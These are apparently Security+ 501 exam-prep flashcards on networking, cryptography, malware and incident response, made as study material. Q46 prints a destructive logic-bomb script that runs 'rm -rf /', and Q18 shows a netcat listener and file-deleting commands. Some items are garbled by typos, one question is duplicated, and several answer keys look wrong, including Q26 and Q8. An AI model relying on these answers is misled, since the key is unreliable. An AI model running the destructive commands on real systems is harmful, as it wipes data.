SECURITY+501 2018 Flashcards

1
Q

Multiple organizations operating in the same vertical want to provide seamless wireless access for their
employees as they visit the other organizations. Which of the following should be implemented if all the
organizations use the native 802.1x client on their mobile devices?

A. Shibboleth
B. RADIUS federation
C. SAML
D. OAuth
E. OpenID Connect
A

B

2
Q

Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the
following secure coding techniques should a security analyst address with the application developers to follow security best practices?

A. Input validation
B. Error handling
C. Obfuscation
D. Data exposure

A

B

3
Q

A security administrator is developing controls for creating audit trails and tracking should a PHI data breach occur. The administrator has been given the following requirements:
*All access must be correlated to a user account.
*All user accounts must be assigned to a single individual.
*User access to the PHI data must be recorded.
*Anomalies in PHI data access must be reported.
*Logs and records cannot be deleted or modified.
Which of the following should the administrator implement to meet the above requirements? (Select THREE).

A. Eliminate shared accounts.
B. Create a standard naming convention for accounts.
C. Implement usage auditing and review.
D. Enable account lockout thresholds.
E. Copy logs in real time to a secured WORM drive.
F. Implement time-of-day restrictions.
G. Perform regular permission audits and reviews.

A

ACE

4
Q

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

A. WPA+CCMP
B. WPA2+CCMP
C. WPA+TKIP
D. WPA2+TKIP

A

D

5
Q

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use?
(Select TWO)

A. TOTP
B. SCP
C. FTP over a non-standard port
D. SRTP
E. Certificate-based authentication
F. SNMPv3
A

BE

6
Q

Which of the following threat actors is MOST likely to steal a company’s proprietary information to gain a
market edge and reduce time to market?

A. Competitor
B. Hacktivist
C. Insider
D. Organized crime

A

A

7
Q

Which of the following BEST describes an important security advantage yielded by implementing vendor
diversity?

A. Sustainability
B. Homogeneity
C. Resiliency
D. Configurability

A

C

8
Q

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

A. Pivoting
B. Process affinity
C. Buffer overflow
D. XSS

A

A

9
Q

Which of the following differentiates a collision attack from a rainbow table attack?

A. A rainbow table attack performs a hash lookup.
B. A rainbow table attack uses the hash as a password.
C. In a collision attack, the hash and the input data are equivalent.
D. In a collision attack, the same input results in different hashes.

A

A

10
Q

A security analyst observes the following events in the logs of an employee workstation:
1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.
The security analyst reviews the file system and observes the following:
C:>dir
C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt
Given the information provided, which of the following MOST likely occurred on the workstation?

A. Application whitelisting controls blocked an exploit payload from executing.
B. Antivirus software found and quarantined three malware files.
C. Automatic updates were initiated but failed because they had not been approved.
D. The SIEM log agent was not tuned properly and reported a false positive

A

A

11
Q

A security technician has been receiving alerts from several servers that indicate load balancers have had a
significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk
space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the
servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

A. Misconfigured devices
B. Logs and events anomalies
C. Authentication issues
D. Unauthorized software

A

D

12
Q

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main
culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved?
(Select TWO)

A. MITM attack
B. DoS attack
C. DLL injection
D. Buffer overflow
E. Resource exhaustion
A

BE

13
Q

Which of the following is used to validate the integrity of data?

A. CBC
B. Blowfish
C. MD5
D. RSA

A

C

14
Q

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely
the case?

A. The certificate has expired
B. The browser does not support SSL
C. The user’s account is locked out
D. The VPN software has reached the seat license maximum

A

A

15
Q

When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal?

A. Infrastructure
B. Platform
C. Software
D. Virtualization

A

A

16
Q

A company was recently audited by a third party. The audit revealed the company’s network devices were
transferring files in the clear. Which of the following protocols should the company use to transfer files?

A. HTTPS
B. LDAPS
C. SCP
D. SNMPv3

A

C

17
Q

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the
analyst MOST likely to obtain to determine the incident?

A. Volatile memory capture
B. Traffic and logs
C. Screenshots
D. System image capture

A

B

18
Q
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for
analysis. The analyst notices that an internal host had a socket established with another internal host over a nonstandard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pakill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket?
A. traceroute 8.8.8.8
B. ping -1 30 8.8.8.8 -a 600
C. nc -1 192.168.5.1 -p 9856
D. pskill pid 9487
A

C

19
Q

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which
of the following should the administrator use? (Select TWO)

A. TOTP
B. SCP
C. FTP over a non-standard port
D. SRTP
E. Certificate-based authentication
F. SNMPv3
A

BE

20
Q

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items.
Which of the following BEST describes why this has occurred? (Select TWO)

A. Privileged-user credentials were used to scan the host
B. Non-applicable plug-ins were selected in the scan policy
C. The incorrect audit file was used
D. The output of the report contains false positives
E. The target host has been compromised

A

BD

21
Q

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in
a third-party software application?

A. Sandboxing
B. Encryption
C. Code signing
D. Fuzzing

A

A

22
Q

A network administrator needs to allocate a new network for the R&D group. The network must not be
accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the
following settings should the network administrator implement to accomplish this?

A. Configure the OS default TTL to 1
B. Use NAT on the R&D network
C. Implement a router ACL
D. Enable protected ports on the switch

A

A

23
Q

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?

A. Least privilege
B. Job rotation
C. Background checks
D. Separation of duties

A

D

24
Q

When attackers use a compromised host as a platform for launching attacks deeper into a company’s network,
it is said that they are:

A. escalating privilege
B. becoming persistent
C. fingerprinting
D. pivoting

A

D

25
Q

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

A. The password expired on the account and needed to be reset
B. The employee does not have the rights needed to access the database remotely
C. Time-of-day restrictions prevented the account from logging in
D. The employee’s account was locked out and needed to be unlocked

A

C

26
Q

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway. Which of the following network devices is
misconfigured and which of the following should be done to remediate the issue?

A. Firewall; implement an ACL on the interface
B. Router; place the correct subnet on the interface
C. Switch; modify the access port to trunk port
D. Proxy; add the correct transparent interface

A

A

27
Q

A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFi-enabled baby monitor while the baby’s parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?

A. Outdated antivirus
B. WiFi signal strength
C. Social engineering
D. Default configuration

A

D

28
Q

A security engineer must install the same X.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?

A. Wildcard certificate
B. Extended validation certificate
C. Certificate chaining
D. Certificate utilizing the SAN file

A

A

29
Q

Which of the following refers to the term used to restore a system to its operational state?

A. MTBF
B. MTTR
C. RTO
D. RPO

A

B

30
Q

A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists in a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

A. Penetration test
B. Vulnerability scan
C. Active reconnaissance
D. Patching assessment report

A

A

31
Q

An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO)

A. TACACS+
B. CHAP
C. LDAP
D. RADIUS
E. MSCHAPv2
A

AD

32
Q

An active/passive configuration has an impact on:

A. confidentiality
B. integrity
C. availability
D. non-repudiation

A

C

33
Q

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML
iframe with JavaScript code via a web browser?

A. Buffer overflow
B. MITM
C. XSS
D. SQLi

A

C

34
Q

Which of the following would provide additional security by adding another factor to a smart card?

A. Token
B. Proximity badge
C. Physical key
D. PIN

A

D

35
Q
A security analyst receives an alert from a WAF with the following payload:
var data = " ++ "
Which of the following types of attacks is this?
A. Cross-site request forgery
B. Buffer overflow
C. SQL injection
D. JavaScript data insertion
E. Firewall evasion script
A

C

36
Q

Which of the following uses precomputed hashes to guess passwords?

A. Iptables
B. NAT tables
C. Rainbow tables
D. ARP tables

A

C

37
Q

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees.
Which of the following would provide strong security and backward compatibility when accessing the wireless
network?

A. Open wireless network and SSL VPN
B. WPA using a preshared key
C. WPA2 using a RADIUS back-end for 802.1x authentication
D. WEP with a 40-bit key

A

B

38
Q

In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence this decision?

A. The scanner must be able to enumerate the host OS of devices scanned
B. The scanner must be able to footprint the network
C. The scanner must be able to check for open ports with listening services
D. The scanner must be able to audit file system permissions

A

D

39
Q

When sending a message using symmetric encryption which of the following must happen FIRST?

A. Exchange encryption keys
B. Establish digital signatures
C. Agree on an encryption method
D. Install digital certificates

A

C

40
Q

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?

A. SSL
B. CRL
C. PKI
D. ACL

A

B

41
Q

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was
installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchost.exe]
TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]
TCP 192.168.1.10:5000 10.37.213.20 wineserver.exe
UDP 192.168.1.10:1900 . SSDPSVR
Based on the above information, which of the following types of malware was installed on the user’s computer?

A. RAT
B. Keylogger
C. Spyware
D. Worm
E. Bot
A

A

42
Q

A company has noticed multiple instances of proprietary information on public websites. It has also observed an
increase in the number of email messages sent to random employees containing malicious links and PDFs.
Which of the following changes should the company make to reduce the risks associated with phishing
attacks? (Select TWO)

A. Install an additional firewall
B. Implement a redundant email server
C. Block access to personal email on corporate systems
D. Update the X.509 certificates on the corporate email server
E. Update corporate policy to prohibit access to social media websites
F. Review access violations on the file server

A

CE

43
Q

A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?

A. Launch an investigation to identify the attacking host
B. Initiate the incident response plan
C. Review lessons learned captured in the process
D. Remove malware and restore the system to normal operation

A

D

44
Q

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of
a vulnerable host?

A. Remote exploit
B. Application
C. Sniffing
D. Man-in-the-middle

A

A

45
Q

Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a
flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends
confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon
investigation, the company learns Joe’s emails were intercepted. Which of the following MOST likely caused
the data breach?

A. Policy violation
B. Social engineering
C. Insider threat
D. Zero-day attack

A

A

46
Q

An information security specialist is reviewing the following output from a Linux server:
user@server:~$ -l
5 * * * * /usr/local/bin.backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep --quiet joeuser /etc/passwd
then rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server?

A. Logic bomb
B. Trojan
C. Backdoor
D. Ransomware
E. Rootkit
A

A

47
Q

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following methods should the technician use?

A. Shredding
B. Wiping
C. Low-level formatting
D. Repartitioning
E. Overwriting
A

A

48
Q

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of
the following is the FIRST step the forensic expert needs to take to preserve the chain of custody?

A. Make a forensic copy
B. Create a hash of the hard drive
C. Recover the hard drive data
D. Update the evidence log

A

B

49
Q

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple
systems may have been compromised. The manager has gathered these facts:
*The breach is currently indicated on six user PCs
*One service account is potentially compromised
*Executive management has been notified
In which of the following phases of the IRP is the manager currently working?

A. Recovery
B. Eradication
C. Containment
D. Identification

A

D

50
Q

A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site
is in a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure
its business is always operational with the least amount of man hours needed. Which of the following types of
disaster recovery sites should the company implement?

A. Hot site
B. Warm site
C. Cold site
D. Cloud-based site

A

D

51
Q

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the
domain controller, the systems administrator needs to provide the domain administrator credentials. Which of
the following account types is the system administrator using?

A. Shared accounts
B. Guest account
C. Service account
D. User account

A

D

52
Q

Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of
the following would allow the users of the separate PKIs to work together without connection errors?

A. Trust model
B. Stapling
C. Intermediate CA
D. Key escrow

A

A

53
Q

A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk?

A. Enable CHAP
B. Disable NTLM
C. Enable Kerberos
D. Disable PAP

A

B

54
Q

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented?

A. Use a camera for facial recognition
B. Have users sign their name naturally
C. Require a palm geometry scan
D. Implement iris recognition

A

B

55
Q

A security analyst is reviewing an assessment report that includes software versions, running services,
supported encryption algorithms, and permission settings. Which of the following produced the report?

A. Vulnerability scanner
B. Protocol analyzer
C. Network mapper
D. Web inspector

A

A

56
Q

A Chief Information Officer (CIO) asks the company’s security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware
infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE
values warrants a recommendation against purchasing the malware protection?

A. $500
B. $1000
C. $2000
D. $2500

A

A

57
Q

The computer resource center issues smartphones to all first-level and above managers. The managers have
the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the
managers installed?

A. Download manager
B. Content manager
C. Segmentation manager
D. Application manager

A

D

58
Q

A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees.
Which of the following should the administrator implement?

A. Shared accounts
B. Preshared passwords
C. Least privilege
D. Sponsored guest

A

D

59
Q

A recent internal audit is forcing a company to review each internal business unit’s VMs because the cluster
they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exists?

A. Buffer overflow
B. End-of-life systems
C. System sprawl
D. Weak configuration

A

C

60
Q

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicates it was pushed from the central patch
system.

File: winx86_adobe_upgrade.exe
Hash: 99ac28bede43ab869b853ba62c4ea243
The administrator pulls a report from the patch management system with the following output:
Install Date | Package Name | Target Device | Hash
10/10/2017 | java_11.2_x64.exe | HQ PC’s | 01ab28bbde63aa879b35bba62cdea282
10/10/2017 | winx86_adobe_flash_upgrade.exe | HQ PC’s | 99ac28bede43ab86b853ba62c4ea243

Given the above output, which of the following MOST likely happened?

A. The file was corrupted after it left the patch system
B. The file was infected when the patch manager downloaded it
C. The file was not approved in the application whitelist system
D. The file was embedded with a logic bomb to evade detection

A

B

61
Q

Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data?

A. Symmetric algorithm
B. Hash function
C. Digital signature
D. Obfuscation

A

A

62
Q

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes
this policy?

A. Physical
B. Corrective
C. Technical
D. Administrative

A

D

63
Q

A software developer is concerned about DLL hijacking in an application being written. Which of the following is
the MOST viable mitigation measure of this type of attack?

A. The DLL of each application should be set individually
B. All calls to different DLLs should be hard-coded in the application
C. Access to DLLs from the Windows registry should be disabled
D. The affected DLLs should be renamed to avoid future hijacking

A

B

64
Q

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual
authentication. Which of the following should the engineer implement if the design requires client MAC
addresses to be visible across the tunnel?

A. Tunnel mode IPSec
B. Transport mode VPN IPSec
C. L2TP
D. SSL VPN

A

D

65
Q

An application was recently compromised after some malformed data came in via web form. Which of the
following would MOST likely have prevented this?

A. Input validation
B. Proxy server
C. Stress testing
D. Encoding

A

A

66
Q

While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation
from the original media. Joe is about to begin copying the user’s files back onto the hard drive. Which of the
following incident response steps is Joe working on now?

A. Recovery
B. Eradication
C. Containment
D. Identification

A

A

67
Q

A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following types
of malware would generate such a file?

A. Keylogger
B. Rootkit
C. Bot
D. RAT

A

A

68
Q

A computer emergency response team is called at midnight to investigate a case in which a mail server was
restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active
connection. Which of the following is the NEXT step the team should take?

A. Identify the source of the active connection
B. Perform eradication of active connection and recover
C. Perform containment procedure by disconnecting the server
D. Format the server and restore its initial configuration

A

A

69
Q

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking
for information about software versions on the network. Which of the following techniques is the intruder using?

A. Banner grabbing
B. Port scanning
C. Packet sniffing
D. Virus scanning

A

A

70
Q

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a
Windows server. Given the following code:

void foo (char *bar)
{
char random_user_input[12];
strcpy (random_user_input, bar);
}
Which of the following vulnerabilities is present?

A. Bad memory pointer
B. Buffer overflow
C. Integer overflow
D. Backdoor

A

B

71
Q

A company has a data classification system with definitions for “Private” and “Public”. The company’s security policy outlines how data should be protected based on type. The company recently added data type
“Proprietary”. Which of the following is the MOST likely reason the company added this data type?

A. Reduced cost
B. More searchable data
C. Better data classification
D. Expanded authority of the privacy officer

A

C

72
Q

A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?

A. Accounting
B. Authorization
C. Authentication
D. Identification

A

A

73
Q

A security administrator installed a new network scanner that identifies new host systems on the network.
Which of the following did the security administrator install?

A. Vulnerability scanner
B. Network-based IDS
C. Rogue system detection
D. Configuration compliance scanner

A

C

74
Q

A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known
vulnerability. Which of the following risk responses does this BEST describe?

A. Transference
B. Avoidance
C. Mitigation
D. Acceptance

A

D

75
Q

An audit takes place after company-wide restructuring, in which several employees changed roles. The
following deficiencies are found during the audit regarding access to confidential data.

Employee (Job Function): Audit Findings
Ann (Sales Manager):
*Access to confidential payroll shares
*Access to payroll processing program
*Access to marketing shares
Jeff (Marketing Director):
*Access to human resources annual review folder
*Access to shared human resources mailbox
John (Sales Manager):
*Active account
*Access to human resources annual review folder
*Access to confidential payroll shares

Which of the following would be the BEST method to prevent similar audit findings in the future?

A. Implement separation of duties for the payroll department
B. Implement a DLP solution on the payroll and human resources reviews
C. Implement rule-based access controls on the human resources server
D. Implement regular permission auditing and reviews

A

D

76
Q

A technician is investigating a potentially compromised device with the following symptoms:

Browser slowness
Frequent browser crashes
Hourglass stuck
New search toolbar
Increased memory consumption

Which of the following types of malware has infected the system?

A. Man-in-the-browser
B. Spoofer
C. Spyware
D. Adware

A

D

77
Q

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application?

A. Hashing
B. Key exchange
C. Encryption
D. Obfuscation

A

D

78
Q

An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its
main entrance and from there gain access to the network. Which of the following would BEST resolve the
vulnerability?

A. Faraday cage
B. Air gap
C. Mantrap
D. Bollards

A

C

79
Q

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the
user’s physical characteristics? (Select TWO)

A. MAC address table
B. Retina scan
C. Fingerprint scan
D. Two-factor authentication
E. CAPTCHA
F. Password string
A

BC